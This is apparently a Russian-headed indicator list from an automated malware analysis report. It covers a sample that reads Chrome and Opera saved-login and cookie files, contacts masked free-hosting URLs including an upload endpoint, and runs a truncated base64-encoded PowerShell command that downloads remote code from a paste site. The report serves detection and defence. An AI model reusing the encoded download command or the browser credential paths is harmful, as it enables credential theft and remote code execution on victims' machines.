Техническая информация
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %APPDATA%\opera software\opera stable\login data
- %LOCALAPPDATA%\google\chrome\user data\default\cookies
- %TEMP%\34586.txt
- %TEMP%\34586.txt
- 'ra####.#00webhostapp.com':80
- http://dp##te.com/FZ5J5E6Q3.txt
- http://ra####.#00webhostapp.com/index.php?me#####################################################################################################################################################...
- http://ra####.#00webhostapp.com/upload.php
- DNS ASK dp##te.com
- DNS ASK ap#.#y-ip.io
- DNS ASK ra####.#00webhostapp.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBkAHAAYQBzAHQAZQAuAGMAbwBtAC8AOQB...